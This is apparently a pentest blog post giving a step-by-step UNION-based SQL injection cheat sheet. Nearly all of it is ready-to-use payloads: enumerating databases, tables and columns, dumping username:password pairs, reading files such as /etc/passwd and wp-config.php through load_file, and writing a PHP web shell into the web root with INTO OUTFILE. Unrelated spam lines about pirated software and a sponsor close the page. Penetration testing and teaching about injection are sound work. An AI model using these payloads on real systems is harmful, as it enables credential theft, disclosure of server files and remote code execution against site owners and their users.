SQL INJECTION – Extracting Username and Password From Database

Admin
1 minute read

Hello! Pentesters, In this article, We will hunt How to extract Database Name, Table_Name, Column_Name, and even USERNAME and PASSWORD from a Database.

Some Basic SQL Command:

  • user()
  • version()
  • database()

1) Find Out User Information

  • union select user()
  • union select database()
  • union select version()

2) Find Out Database Name

  • union select group_concat(schema_name) from information_schema.schemata

3) Find Out Tables Name

  • union select group_concat(table_name) from information_schema.tables where table_schema=’#Database_Name’

4) Find Out Columns Name

  • union select group_concat(column_name) from information_schema.columns where table_name=’#Table_Name’

5) Extract Username And Password From Database

  • union select group_concat(username,’:’,password) from #table_name

6) Check All Privileges inside the Database

  • union select privilege_type FROM information_schema.user_privileges where grantee = “user()” #’uhc’@’localhost’

7) Read Arbitrary Operating System File inside the Database

  • union select load_file(‘/etc/passwd’)
  • union select load_file(‘/etc/os-release’)
  • union select load_file(‘/var/www/wordpress/wp-config.php’)
  • union select load_file(‘/etc/issue’)
  • union select load_file(‘/var/log/apache2/access.log’)
  • union select load_file(‘/etc/apache2/sites-available/000-default.conf’)
  • union select load_file(‘/etc/fstab’)

8) Create a Malicious PHP Shell Inside the Database

  • union select “<?php system($_REQUEST[pentestblog]);?>” into outfile ‘/var/www/html/shell.php’

Rating: 5 out of 5.
Trending
How To Dump Username And Password Using SQLMap Tool?

Recent Posts

Most Popular Posts

CTF Challenges for Beginners

The post SQL INJECTION – Extracting Username and Password From Database appeared first on Pentestblog.


Descarga programas full El pirata de San Jhony

This post is sponsored by Woodmex Studio